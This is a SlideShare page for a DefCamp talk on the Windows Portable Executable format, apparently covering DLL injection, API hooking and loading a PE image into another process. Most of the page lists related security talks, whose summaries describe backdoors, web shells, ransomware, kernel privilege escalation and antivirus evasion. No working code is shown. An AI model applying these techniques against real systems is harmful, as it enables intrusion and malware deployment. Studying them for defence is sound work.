Formatul Portable Executable
•Download as PPT, PDF•
0 likes•1,197 views
The document discusses various techniques for injecting code into processes including DLL injection, API hooking, and loading a portable executable (PE) file into another process's memory. It provides code to load a PE file from disk into the memory of a running process, modify the process's context to start execution at the loaded code's entry point, and resume the thread.
Report
Share
Report
Share
![Defcamp 0x7DB ,[object Object],[object Object],[object Object],http://www.rstcenter.com/forum/](https://image.slidesharecdn.com/prezentare-111005113308-phpapp02/85/Formatul-Portable-Executable-1-320.jpg)
Recommended
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
This document provides an introduction to exploiting vulnerabilities in Windows kernel drivers for privilege escalation. It discusses the differences between user mode and kernel mode, how drivers communicate with user programs through I/O requests, techniques for analyzing and fuzzing drivers, potential privilege escalation methods like overwriting function pointers and token stealing, and how to set up a kernel debugging environment. The overall goal is to find bugs in kernel drivers that could allow gaining kernel-level code execution and full system access.
NYU hacknight, april 6, 2016
Linux has this great tool called strace, on OSX there’s a tool called dtruss - based on dtrace. Dtruss is great in functionality, it gives pretty much everything you need. It is just not as nice to use as strace. However, on Linux there is also ltrace for library tracing. That is arguably more useful because you can see much more granular application activity. Unfortunately, there isn’t such a tool on OSX. So, I decided to make one - albeit a simpler version for now. I called it objc_trace.
Sniffing Mach Messages
The document discusses sniffing Mach messages on iOS and macOS. It provides an overview of the Mach message protocol and how to intercept and parse Mach messages using LLDB scripts. It describes setting breakpoints at functions like bootstrap_look_up and mach_msg, and using Python scripts to extract information from the messages, including the port name and number. Examples are given of intercepting messages from the libsimulatetouch library. The challenge proposed is to port the LLDB scripts to macOS and identify other uses of Mach messages, such as using Frida.
Unix Programming with Perl
- The document discusses various aspects of Unix programming using Perl, including handling errors, filehandles after forking processes, and signals.
- It provides examples of how to properly check for errors, avoid resource collisions after forking, and make code cancellable using signals.
- Key topics covered include using the Errno module to check for errors, closing filehandles after forks to prevent sharing issues, and trapping signals like SIGPIPE and SIGTERM.
Art of Web Backdoor - Pichaya Morimoto
Topic: Art of Web Backdoor
Speaker: Pichaya Morimoto
Event: 2600 Thailand Meeting #5
Date: September 6, 2013
Video: https://www.youtube.com/watch?v=QIXTPPBfLyI
Using the Power to Prove
This document discusses using the prove command-line tool to run tests and other scripts. Prove is a test runner that uses the Test Anything Protocol (TAP) to aggregate results. It can run tests and scripts written in any language by specifying the interpreter with --exec. Extensions other than .t can be run by setting --ext. Prove searches for tests in the t/ directory by default but can run any kind of scripts or tasks placed in t/, such as service monitoring scripts. The .proverc file can save common prove options for a project.
iOS Automation Primitives
Mikhail Sosonkin discusses iOS automation primitives and tools for blackbox testing of iOS applications without developer access. He outlines static and dynamic analysis techniques using tools like IDAPro, Cycript, and Frida. Sosonkin then introduces CHAOTICMARCH, an open source framework he developed that uses Lua scripts to simulate user interactions, find UI elements, and automate testing of iOS apps through a lightweight injected module. The goal is to build a library of automated testing logic that can be run against any iOS application.
Book
The document discusses Node.js and provides instructions for installing Node.js via different methods:
1) Homebrew can be used to install Node.js on OSX by running "brew install node.js".
2) nDistro allows creating and installing Node.js distributions within seconds by specifying module and Node binary version dependencies in a .ndistro file.
3) Node.js can be compiled from source by cloning the Node.js repository via git or downloading the source, running configuration, make, and make install commands.
Recommended
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
This document provides an introduction to exploiting vulnerabilities in Windows kernel drivers for privilege escalation. It discusses the differences between user mode and kernel mode, how drivers communicate with user programs through I/O requests, techniques for analyzing and fuzzing drivers, potential privilege escalation methods like overwriting function pointers and token stealing, and how to set up a kernel debugging environment. The overall goal is to find bugs in kernel drivers that could allow gaining kernel-level code execution and full system access.
NYU hacknight, april 6, 2016
Linux has this great tool called strace, on OSX there’s a tool called dtruss - based on dtrace. Dtruss is great in functionality, it gives pretty much everything you need. It is just not as nice to use as strace. However, on Linux there is also ltrace for library tracing. That is arguably more useful because you can see much more granular application activity. Unfortunately, there isn’t such a tool on OSX. So, I decided to make one - albeit a simpler version for now. I called it objc_trace.
Sniffing Mach Messages
The document discusses sniffing Mach messages on iOS and macOS. It provides an overview of the Mach message protocol and how to intercept and parse Mach messages using LLDB scripts. It describes setting breakpoints at functions like bootstrap_look_up and mach_msg, and using Python scripts to extract information from the messages, including the port name and number. Examples are given of intercepting messages from the libsimulatetouch library. The challenge proposed is to port the LLDB scripts to macOS and identify other uses of Mach messages, such as using Frida.
Unix Programming with Perl
- The document discusses various aspects of Unix programming using Perl, including handling errors, filehandles after forking processes, and signals.
- It provides examples of how to properly check for errors, avoid resource collisions after forking, and make code cancellable using signals.
- Key topics covered include using the Errno module to check for errors, closing filehandles after forks to prevent sharing issues, and trapping signals like SIGPIPE and SIGTERM.
Art of Web Backdoor - Pichaya Morimoto
Topic: Art of Web Backdoor
Speaker: Pichaya Morimoto
Event: 2600 Thailand Meeting #5
Date: September 6, 2013
Video: https://www.youtube.com/watch?v=QIXTPPBfLyI
Using the Power to Prove
This document discusses using the prove command-line tool to run tests and other scripts. Prove is a test runner that uses the Test Anything Protocol (TAP) to aggregate results. It can run tests and scripts written in any language by specifying the interpreter with --exec. Extensions other than .t can be run by setting --ext. Prove searches for tests in the t/ directory by default but can run any kind of scripts or tasks placed in t/, such as service monitoring scripts. The .proverc file can save common prove options for a project.
iOS Automation Primitives
Mikhail Sosonkin discusses iOS automation primitives and tools for blackbox testing of iOS applications without developer access. He outlines static and dynamic analysis techniques using tools like IDAPro, Cycript, and Frida. Sosonkin then introduces CHAOTICMARCH, an open source framework he developed that uses Lua scripts to simulate user interactions, find UI elements, and automate testing of iOS apps through a lightweight injected module. The goal is to build a library of automated testing logic that can be run against any iOS application.
Book
The document discusses Node.js and provides instructions for installing Node.js via different methods:
1) Homebrew can be used to install Node.js on OSX by running "brew install node.js".
2) nDistro allows creating and installing Node.js distributions within seconds by specifying module and Node binary version dependencies in a .ndistro file.
3) Node.js can be compiled from source by cloning the Node.js repository via git or downloading the source, running configuration, make, and make install commands.
Synack Shakacon OSX Malware Persistence
Launchd loads at startup and is responsible for loading daemons and agents to initialize the OS core and launch the login window. The document then discusses various methods of malware persistence on macOS, including abusing flaws in code signing and kernel extension loading to allow unsigned or modified code to run at startup. It notes that improved analysis tools would help strengthen macOS security.
Codetainer: a Docker-based browser code 'sandbox'
Codetainer is a browser-based sandbox for running Docker containers. It allows users to "try 'X' in your browser" for any X by running Docker containers in an isolated and programmable manner directly in the browser. Codetainer uses Docker APIs to launch and manage lightweight containers via a Go-based API server. Users can create and register Docker images, launch "codetainers" from those images, and interact with the codetainers through the browser via websockets, viewing terminals and sending keystrokes. Codetainer aims to provide a secure and flexible environment for use cases like tutorials, training, and remote management while addressing challenges around container introspection and security.
Unix Programming with Perl 2
The document summarizes techniques for Unix programming with Perl, focusing on advanced topics like inter-process communication, signals, and avoiding race conditions. It discusses using IPC::Open3 to avoid deadlocks when communicating between processes via pipes. It also covers how to safely sleep while waiting for a signal using POSIX::pselect or a socketpair to avoid race conditions. Proper error handling for signals is mentioned but not shown.
Mach-O Internals
The document discusses the Mach-O file format used on Mac OS X for compiled programs and libraries. It describes the Mach-O header, load commands, symbols, linking and loading processes. It also demonstrates how to explore Mach-O files using command line tools like otool and graphical tools like Mach-O View. Dynamic linking and the procedure linkage table are explained. Finally, it introduces a Mach-O hooking tool for intercepting function calls at runtime.
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23
Remember DLL hijacking on Windows? Well, turns out that OS X is fundamentally vulnerable to a similar attack (independent of the user's environment).
By abusing various 'features' and undocumented aspects of OS X's dynamic loader, this talk will reveal how attackers need only to plant specially-crafted dynamic libraries to have their malicious code automatically loaded into vulnerable applications. Through this attack, adversaries can perform a wide range of malicious actions, including stealthy persistence, process injection, security software circumvention, and even 'remote' infection. So come watch as applications fall, Gatekeeper crumbles (allowing downloaded unsigned code to execute), and 'hijacker malware' arises - capable of bypassing all top security and anti-virus products! And since "sharing is caring" leave with code and tools that can automatically uncover vulnerable binaries, generate compatible hijacker libraries, or detect if you've been hijacked.
Patrick Wardle is the Director of Research at Synack, where he leads cyber R&D efforts. Having worked at NASA, the NSA, and Vulnerability Research Labs (VRL), he is intimately familiar with aliens, spies, and talking nerdy. Currently, Patrick’s focus is on automated vulnerability discovery, and the emerging threats of OS X and mobile malware.
PHP Secure Programming
The document discusses various PHP security vulnerabilities like code injection, SQL injection, cross-site scripting (XSS), session hijacking, and remote code execution. It provides examples of each vulnerability and methods to prevent them, such as input validation, output encoding, secure session management, and restricting shell commands. The goal is to teach secure PHP programming practices to avoid security issues and defend against common attacks.
PSR-7 and PSR-15, why can't you ignore them
PSR-7 and PSR-15 are PHP standards for representing HTTP messages and server request handling. PSR-7 defines interfaces for HTTP messages like requests and responses, while PSR-15 defines interfaces for request handlers and middleware. These standards provide a common way for PHP libraries to interact with HTTP messages and requests, improving interoperability. They also allow applications to be built in a way that is compatible with evolving PHP frameworks and tools. Adopting these PSRs helps create a solid foundation for building HTTP applications and middleware in PHP.
Debugging: Rules & Tools
Finding and fixing bugs is a major chunk of any developers time. This talk describes the basic rules for effective debugging in any language, but shows how the tools available in PHP can be used to find and fix even the most elusive error
C99[2]
This document contains information about c99shell.php, a PHP-based file manager tool intended for hacking. It lists features like managing local and remote files/folders, an advanced SQL manager, executing shell commands and PHP code, and self-removal. The document provides configuration options, registered file types, command aliases, and notes on expected future changes.
Node.js - iJS 2019
Slides from talk about Node.js held on JavaScript Fullstack Day at International JavaScript Conference 2019 (https://javascript-conference.com/web-development-architecture/javascript-fullstack-day-from-zero-to-hero/)
Simple php backdoor_by_dk
This PHP script allows remote execution of system commands on a vulnerable server. By accessing the PHP file with a "cmd" parameter containing the desired command, the script will run that command and display the output, providing a backdoor for unauthorized access and control of the server. It demonstrates how an insecure file upload or code injection could enable an attacker to execute arbitrary commands from a web browser.
[2014 CodeEngn Conference 11] 정든품바 - 웹성코드
2014 CodeEngn Conference 11
웹페이지를 조작한다면 무엇을 해보시겠습니까 ?
우리는 매일 인터넷을 사용하지만 접속하는 웹페이지마다 변조되었다는 의심을 해보는 경우는 거의 없다. 웹브라우저가 웹페이지를 읽어오는 과정과 이를 이용해서 조작되는 과정을 알아보고 악성코드 제작자 입장이 되어 무엇을 할 수 있는지 알아보자
http://codeengn.com/conference/11
http://codeengn.com/conference/archive
Django - Know Your Namespace: Middleware
This document discusses Django middleware and provides an example of a custom middleware class called DBLogMiddleware. It summarizes that Django middleware can be used to handle common tasks like sessions, caching, authentication, and more. It then demonstrates how to create a custom middleware class to log exceptions to a database. The DBLogMiddleware class processes exceptions by recording error details, traceback, and server information to database models.
Node.js - Best practices
This document discusses best practices for handling errors and callbacks in Node.js applications. It covers techniques like error delegation, exception handling, error-first callbacks, avoiding nested callbacks, and using control flow libraries. It also discusses deployment strategies like using screen, restarting crashed processes, and innovating with platforms like Joyent, Nodejitsu and Heroku.
Introduction to puppet - Hands on Session at HPI Potsdam
This document provides an overview of a tutorial and hands-on session about configuration management using Puppet. The session will cover why configuration management is useful, the Puppet DSL for writing configuration files, how Puppet runs work, using Puppet both with and without a master server, and a hands-on demonstration of setting up NTP with Puppet modules.
LibreSSL
LibreSSL is a version of the TLS/crypto stack forked from OpenSSL in 2014, with goals of modernizing the codebase, improving security, and applying best practice development processes.
Primary development occurs inside the OpenBSD source tree with the usual care the project is known for. On a regular basis the code is re-packaged for portable use by other operating systems.
DLL Hijacking on OS X
CanSecWest 2015 presentation from Patrick Wardle. DLL hijacking history and dylib hijacking on OS X are detailed.
ZeroNights: Automating iOS blackbox security scanning
The document discusses several tools for testing iOS applications, including ChaoticMarch, Machshark, and Objc_trace. ChaoticMarch is described as a tool for simulating user interactions and automating testing of an iOS app. It allows writing Lua scripts to interact with the UI and regulate test execution speed. Machshark is a tool for analyzing Mach IPC messages and Objc_trace is used to trace Objective-C method calls. Code snippets are provided showing examples of how to use ChaoticMarch to automate tapping buttons and entering text, as well as how Machshark and Objc_trace work.
Getting started with TDD - Confoo 2014
This document provides an introduction to test-driven development (TDD) and unit testing in PHP. It discusses where to start with TDD, what unit tests are, and tools to use like PHPUnit. It covers the red-green-refactor TDD cycle and topics like mocking dependencies, handling file systems and databases in tests, and continuous integration. The goal is to help PHP developers get started with TDD.
Angular js security
This document discusses various techniques for securing AngularJS applications, including authenticating users via API endpoints, using services for session management, interceptors for authentication, and resolving routes. It also covers preventing CSRF and XSS attacks using tokens, sanitizing untrusted data, and tools for security audits. Recommendations are to make security decisions on the server, protect services, and use security HTTP headers while being careful with untrusted client-side data.
Userland Hooking in Windows
This document is the first of a series of five articles relating to the art of hooking.
All: https://www.htbridge.ch/publications/
More Related Content
What's hot
Synack Shakacon OSX Malware Persistence
Launchd loads at startup and is responsible for loading daemons and agents to initialize the OS core and launch the login window. The document then discusses various methods of malware persistence on macOS, including abusing flaws in code signing and kernel extension loading to allow unsigned or modified code to run at startup. It notes that improved analysis tools would help strengthen macOS security.
Codetainer: a Docker-based browser code 'sandbox'
Codetainer is a browser-based sandbox for running Docker containers. It allows users to "try 'X' in your browser" for any X by running Docker containers in an isolated and programmable manner directly in the browser. Codetainer uses Docker APIs to launch and manage lightweight containers via a Go-based API server. Users can create and register Docker images, launch "codetainers" from those images, and interact with the codetainers through the browser via websockets, viewing terminals and sending keystrokes. Codetainer aims to provide a secure and flexible environment for use cases like tutorials, training, and remote management while addressing challenges around container introspection and security.
Unix Programming with Perl 2
The document summarizes techniques for Unix programming with Perl, focusing on advanced topics like inter-process communication, signals, and avoiding race conditions. It discusses using IPC::Open3 to avoid deadlocks when communicating between processes via pipes. It also covers how to safely sleep while waiting for a signal using POSIX::pselect or a socketpair to avoid race conditions. Proper error handling for signals is mentioned but not shown.
Mach-O Internals
The document discusses the Mach-O file format used on Mac OS X for compiled programs and libraries. It describes the Mach-O header, load commands, symbols, linking and loading processes. It also demonstrates how to explore Mach-O files using command line tools like otool and graphical tools like Mach-O View. Dynamic linking and the procedure linkage table are explained. Finally, it introduces a Mach-O hooking tool for intercepting function calls at runtime.
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23
Remember DLL hijacking on Windows? Well, turns out that OS X is fundamentally vulnerable to a similar attack (independent of the user's environment).
By abusing various 'features' and undocumented aspects of OS X's dynamic loader, this talk will reveal how attackers need only to plant specially-crafted dynamic libraries to have their malicious code automatically loaded into vulnerable applications. Through this attack, adversaries can perform a wide range of malicious actions, including stealthy persistence, process injection, security software circumvention, and even 'remote' infection. So come watch as applications fall, Gatekeeper crumbles (allowing downloaded unsigned code to execute), and 'hijacker malware' arises - capable of bypassing all top security and anti-virus products! And since "sharing is caring" leave with code and tools that can automatically uncover vulnerable binaries, generate compatible hijacker libraries, or detect if you've been hijacked.
Patrick Wardle is the Director of Research at Synack, where he leads cyber R&D efforts. Having worked at NASA, the NSA, and Vulnerability Research Labs (VRL), he is intimately familiar with aliens, spies, and talking nerdy. Currently, Patrick’s focus is on automated vulnerability discovery, and the emerging threats of OS X and mobile malware.
PHP Secure Programming
The document discusses various PHP security vulnerabilities like code injection, SQL injection, cross-site scripting (XSS), session hijacking, and remote code execution. It provides examples of each vulnerability and methods to prevent them, such as input validation, output encoding, secure session management, and restricting shell commands. The goal is to teach secure PHP programming practices to avoid security issues and defend against common attacks.
PSR-7 and PSR-15, why can't you ignore them
PSR-7 and PSR-15 are PHP standards for representing HTTP messages and server request handling. PSR-7 defines interfaces for HTTP messages like requests and responses, while PSR-15 defines interfaces for request handlers and middleware. These standards provide a common way for PHP libraries to interact with HTTP messages and requests, improving interoperability. They also allow applications to be built in a way that is compatible with evolving PHP frameworks and tools. Adopting these PSRs helps create a solid foundation for building HTTP applications and middleware in PHP.
Debugging: Rules & Tools
Finding and fixing bugs is a major chunk of any developers time. This talk describes the basic rules for effective debugging in any language, but shows how the tools available in PHP can be used to find and fix even the most elusive error
C99[2]
This document contains information about c99shell.php, a PHP-based file manager tool intended for hacking. It lists features like managing local and remote files/folders, an advanced SQL manager, executing shell commands and PHP code, and self-removal. The document provides configuration options, registered file types, command aliases, and notes on expected future changes.
Node.js - iJS 2019
Slides from talk about Node.js held on JavaScript Fullstack Day at International JavaScript Conference 2019 (https://javascript-conference.com/web-development-architecture/javascript-fullstack-day-from-zero-to-hero/)
Simple php backdoor_by_dk
This PHP script allows remote execution of system commands on a vulnerable server. By accessing the PHP file with a "cmd" parameter containing the desired command, the script will run that command and display the output, providing a backdoor for unauthorized access and control of the server. It demonstrates how an insecure file upload or code injection could enable an attacker to execute arbitrary commands from a web browser.
[2014 CodeEngn Conference 11] 정든품바 - 웹성코드
2014 CodeEngn Conference 11
웹페이지를 조작한다면 무엇을 해보시겠습니까 ?
우리는 매일 인터넷을 사용하지만 접속하는 웹페이지마다 변조되었다는 의심을 해보는 경우는 거의 없다. 웹브라우저가 웹페이지를 읽어오는 과정과 이를 이용해서 조작되는 과정을 알아보고 악성코드 제작자 입장이 되어 무엇을 할 수 있는지 알아보자
http://codeengn.com/conference/11
http://codeengn.com/conference/archive
Django - Know Your Namespace: Middleware
This document discusses Django middleware and provides an example of a custom middleware class called DBLogMiddleware. It summarizes that Django middleware can be used to handle common tasks like sessions, caching, authentication, and more. It then demonstrates how to create a custom middleware class to log exceptions to a database. The DBLogMiddleware class processes exceptions by recording error details, traceback, and server information to database models.
Node.js - Best practices
This document discusses best practices for handling errors and callbacks in Node.js applications. It covers techniques like error delegation, exception handling, error-first callbacks, avoiding nested callbacks, and using control flow libraries. It also discusses deployment strategies like using screen, restarting crashed processes, and innovating with platforms like Joyent, Nodejitsu and Heroku.
Introduction to puppet - Hands on Session at HPI Potsdam
This document provides an overview of a tutorial and hands-on session about configuration management using Puppet. The session will cover why configuration management is useful, the Puppet DSL for writing configuration files, how Puppet runs work, using Puppet both with and without a master server, and a hands-on demonstration of setting up NTP with Puppet modules.
LibreSSL
LibreSSL is a version of the TLS/crypto stack forked from OpenSSL in 2014, with goals of modernizing the codebase, improving security, and applying best practice development processes.
Primary development occurs inside the OpenBSD source tree with the usual care the project is known for. On a regular basis the code is re-packaged for portable use by other operating systems.
DLL Hijacking on OS X
CanSecWest 2015 presentation from Patrick Wardle. DLL hijacking history and dylib hijacking on OS X are detailed.
ZeroNights: Automating iOS blackbox security scanning
The document discusses several tools for testing iOS applications, including ChaoticMarch, Machshark, and Objc_trace. ChaoticMarch is described as a tool for simulating user interactions and automating testing of an iOS app. It allows writing Lua scripts to interact with the UI and regulate test execution speed. Machshark is a tool for analyzing Mach IPC messages and Objc_trace is used to trace Objective-C method calls. Code snippets are provided showing examples of how to use ChaoticMarch to automate tapping buttons and entering text, as well as how Machshark and Objc_trace work.
Getting started with TDD - Confoo 2014
This document provides an introduction to test-driven development (TDD) and unit testing in PHP. It discusses where to start with TDD, what unit tests are, and tools to use like PHPUnit. It covers the red-green-refactor TDD cycle and topics like mocking dependencies, handling file systems and databases in tests, and continuous integration. The goal is to help PHP developers get started with TDD.
Angular js security
This document discusses various techniques for securing AngularJS applications, including authenticating users via API endpoints, using services for session management, interceptors for authentication, and resolving routes. It also covers preventing CSRF and XSS attacks using tokens, sanitizing untrusted data, and tools for security audits. Recommendations are to make security decisions on the server, protect services, and use security HTTP headers while being careful with untrusted client-side data.
What's hot (20)
Introduction to puppet - Hands on Session at HPI Potsdam
Introduction to puppet - Hands on Session at HPI Potsdam
ZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanning
Viewers also liked
Userland Hooking in Windows
This document is the first of a series of five articles relating to the art of hooking.
All: https://www.htbridge.ch/publications/
Viewers also liked (7)
Similar to Formatul Portable Executable
Code Injection in Windows
This document discusses different techniques for injecting code on Windows systems, including PE file infection, IAT hooking, and runtime code injection. PE file infection involves overwriting a section like .code and changing the entry point to inject malicious code. IAT hooking changes the DLL name in the import address table to point to a proxy DLL for intercepting function calls. Runtime code injection uses APIs like CreateRemoteThread and WriteProcessMemory to load a DLL or executable into another process's memory and execute it remotely.
Arduino、Web 到 IoT
Arduino is a popular hardware platform for IoT projects. This document discusses connecting Arduino devices to the web and cloud services. It introduces IoT concepts and components like hardware devices, communication protocols, data storage, and business logic. Ways to connect Arduino to web servers using libraries and shields are described. Popular cloud IoT platforms like ThingSpeak and Temboo and how to use them with Arduino Yun are also covered.
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Charlie Miller and Vincenzo Iozzo presented techniques for post-exploitation on the iPhone 2 including:
1. Running arbitrary shellcode by overwriting memory protections and calling vm_protect to mark pages as read/write/executable.
2. Loading an unsigned dynamic library called Meterpreter by mapping it over an existing signed library, patching dyld to ignore code signing, and forcing unloaded of linked libraries.
3. Adding new functionality to Meterpreter, such as a module to vibrate and play a sound on the iPhone, demonstrating how payloads can be extended once loaded into memory.
Sandboxie process isolation with kernel hooks
Sandboxie is a process isolation sandbox that controls access to kernel resources and window messages. It uses kernel drivers to hook important kernel objects and APIs to restrict access for sandboxed processes. The driver intercepts attempts by sandboxed processes to access resources and redirects them to secure driver interfaces. The driver also hooks window message APIs in win32k.sys to filter messages from sandboxed applications to other processes. This allows sandboxed processes to run in a restricted environment isolated from the rest of the system.
6. processes and threads
This document discusses processes and threads. It defines a process as a running program with a single flow of execution, while a thread is a flow of execution within a process. It describes how processes are created using fork and exec functions in Linux. It also discusses different types of processes like foreground, background, and daemon processes. Finally, it covers various inter-process communication (IPC) techniques like pipes, shared memory, message queues, semaphores, and signals that processes can use to communicate with each other.
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
Banking Trojans have been part of the financial cybercrime landscape for over a decade, causing losses measured in billions of dollars. On the flip side, the constant evolution of defenses against this type of malware has forced Trojan operators to adjust to security controls designed to keep them out. As a result, many Trojan operators have either disappeared or considerably narrowed their activity scope, but more interestingly, are using novel techniques to achieve their goals. In this talk, we will present three top malware operators active in the wild and their use of automated scripts to tackle their challenges: The notorious Gozi (ISFB) malware used to run its own executable files. Nowadays, it avoids storing malicious payloads on disk and instead, writes a Powershell script to the Windows registry and executes it using a special regex-based run-key. Ramnit, a dated foe that focuses on UK banks, encrypts its payload using a Windows API function with a device-unique key. In every system reboot, it decrypts the payload in-memory and runs it with a Visual Basic script that runs Powershell. This allows Ramnit to avoid running a detectable, executable file as it used to do in the past. BackSwap is a new banking Trojan that attacks financial institutions in Spain. Its dropper is a JavaScript Encoded (JSE) file. When decoded, the dropper results in a 30k lines-of-code script which downloads a binary sample from a remote Command-and-Control server. Together with our audience, we will walk through the research process and share our findings along with our (sometimes) quick-and-dirty solutions. We aim to enhance our participants’ knowledge of today’s bankers and help them get deeper into current-day scripting-related techniques cybercriminals use.
Ransomware for fun and non-profit
The document discusses how ransomware works by encrypting files on a victim's computer and demanding payment to decrypt the files. It explains the basic process of how ransomware encrypts files, displays a ransom message, and transmits encryption keys to the attacker. The document also provides examples of code that could be used to implement various functions required for a basic ransomware program, such as generating encryption keys, encrypting files, and displaying messages. Finally, it discusses techniques malware developers use to avoid detection by antivirus software.
Backdoor coding
This document discusses creating a backdoor by disguising a malicious program as the calculator application. It describes using Python code to start the real calculator program while also running injection code to load additional malicious payloads into the process's memory without the user's knowledge. The code samples show how to launch the target process, allocate memory in its space, write the payload data, and inject it by creating a remote thread. The goal is to stealthily execute unauthorized code on a system by hijacking the trusted calculator program.
How to drive a malware analyst crazy
This document discusses techniques that malware authors use to frustrate malware analysts, including inserting breakpoints, manipulating timing functions, exploiting Windows internals like debug flags and objects, anti-dumping methods, VM detection, and debugger-specific tricks. The author also announces a public malware repository and API called VXCage for sharing samples.
44CON London 2015 - How to drive a malware analyst crazy
This document discusses techniques that malware authors use to frustrate malware analysts, including inserting breakpoints, manipulating timing functions, exploiting Windows internals, anti-dumping measures, and virtual machine detection. The author then provides recommendations for malware analysts to identify and circumvent these anti-analysis techniques.
Web application security
Web application security is an important topic gaining more attention. Sensitive data needs protection not only on servers but also when traveling over networks. Common web application vulnerabilities include cross-site scripting, SQL injection, and cross-site request forgery. Developers should implement measures like encryption, limiting file access and uploads, hiding errors, and using secure sessions to authenticate users. Security requires ongoing consideration to prevent network attacks, unauthorized access, and data theft.
DEF CON 24 - Patrick Wardle - 99 problems little snitch
Little Snitch is a host-based firewall for macOS that intercepts connection attempts and allows the user to approve or deny them. The document discusses understanding, bypassing, and reversing Little Snitch. It provides an overview of Little Snitch's components and architecture, describes several methods for bypassing its network filtering, and examines techniques for interacting with and disabling Little Snitch's kernel extension through the I/O Kit framework.
[DefCon 2016] I got 99 Problems, but
Little Snitch ain’t one!
Security products should make our computers more secure, not less. Little Snitch is the de facto personal firewall for OS X that aims to secure a Mac by blocking unauthorized network traffic. Unfortunately bypassing this firewall's network monitoring mechanisms is trivial...and worse yet, the firewall's kernel core was found to contain an exploitable ring-0 heap-overflow. #fail
Reutov, yunusov, nagibin random numbers take ii
The document discusses vulnerabilities in random number generation in PHP. It summarizes several vulnerabilities discovered between 2008-2012 related to predictable random numbers generated by PHP functions like mt_rand(). It also discusses how PHP developers have been slow to address these issues. The document then provides step-by-step explanations of how to exploit vulnerabilities in four different CMS platforms - OpenCart, DataLife Engine, UMI.CMS, and OpenCart again - by predicting random values used for tasks like password resets and session IDs.
Random numbers
The document discusses vulnerabilities in random number generation in PHP. It summarizes several vulnerabilities discovered between 2008-2012 related to predictable random numbers generated by PHP functions like mt_rand(). It also discusses how PHP developers have been slow to address these issues. The document then provides step-by-step explanations of how to exploit vulnerabilities in four different CMS platforms - OpenCart, DataLife Engine, UMI.CMS, and OpenCart again - by predicting random values used for tasks like password resets and session IDs.
Strategies to design FUD malware
.Today, criminals are using novel tecnhiques to bypass AV detecions. Manual debugging must be used to unpack malware (a hard work that is needed to reveal the original malware code). Dissecting malware allows us to understand criminals’ modus operandi, and manual analysis is always required to reveal FUD malware.
Virtually Pwned
The document discusses attacking virtualization infrastructure through various exploits. It presents the Virtualization ASsessment TOolkit (VASTO) which is an exploit pack focusing on virtualization and cloud security. It then demonstrates several exploits against VMware virtualization software, including path traversal exploits, session hijacking, and code execution exploits affecting the vCenter management console, ESXi hypervisor, and supporting services. The talk encourages testing these attacks to better understand vulnerabilities in virtualization platforms.
CGI.ppt
This document discusses common gateway interface (CGI) programming and server-side programming. It provides examples of CGI programs written in C to multiply two numbers submitted through an HTML form using GET and POST methods. It discusses how CGI works, including getting environment variables and user input. Some disadvantages of CGI include spawning new processes for each request and security issues. It suggests using server-side scripting languages like PHP for more efficient and secure server-side programming.
6.Web Servers
This is a part of the slide set used at the MakerSpace Noida (India) launch event, Pi Maker Workshop. This slide set is designed to help people get started with the Raspberry Pi and also serves as a collection of innovative projects and some core basic concepts that can aid anybody with their first few steps into the world of DIY electronics or maybe serve as a refresher for the experienced.
Feel free to refer and share but please don't alter the watermarks :)
PHPUG Presentation
This document summarizes common web application vulnerabilities like SQL injection and cross-site scripting (XSS) for PHP applications. It provides examples of each vulnerability and discusses mitigation strategies like input sanitization, encoding output, and using security frameworks. It also covers other risks like cross-site request forgery (CSRF) and the importance of secure server configurations.
Similar to Formatul Portable Executable (20)
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitch
[DefCon 2016] I got 99 Problems, but
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but
Little Snitch ain’t one!
More from DefCamp
Remote Yacht Hacking
Stephan Gerling in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.
The videos and other presentations can be found on https://def.camp/archive
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Yury Chemerkin in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.
The videos and other presentations can be found on https://def.camp/archive
The Charter of Trust
Stefan Zarinschi in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.
The videos and other presentations can be found on https://def.camp/archive
Internet Balkanization: Why Are We Raising Borders Online?
Stefan Tanase in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.
The videos and other presentations can be found on https://def.camp/archive
Bridging the gap between CyberSecurity R&D and UX
(1) The document discusses bridging the gap between research and development (R&D) and user experience (UX) in product development.
(2) It emphasizes the importance of asking questions to understand user needs, focusing on user feelings over features, and ensuring users understand how to use products easily.
(3) The key lessons are to thoroughly question requirements, balance R&D and UX priorities, focus on satisfying core users, understand what users truly value, and make products feel intuitive and fast to use.
Secure and privacy-preserving data transmission and processing using homomorp...
Razvan Bocu in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.
The videos and other presentations can be found on https://def.camp/archive
Drupalgeddon 2 – Yet Another Weapon for the Attacker
Radu-Emanuel Chiscariu in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.
The videos and other presentations can be found on https://def.camp/archive
Economical Denial of Sustainability in the Cloud (EDOS)
Raluca Stanciu in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.
The videos and other presentations can be found on https://def.camp/archive
Trust, but verify – Bypassing MFA
This document discusses multi-factor authentication (MFA) and methods for bypassing it. It defines MFA as requiring more than one validation procedure to authenticate individuals. It describes the different factors of authentication as something you know, something you have, and something you are. It outlines various deployment modules for each factor type, including passwords, tokens, biometrics. It also covers challenges of MFA implementation and methods attackers could use to bypass MFA security, such as email filtering or legacy protocol exploitation.
Threat Hunting: From Platitudes to Practical Application
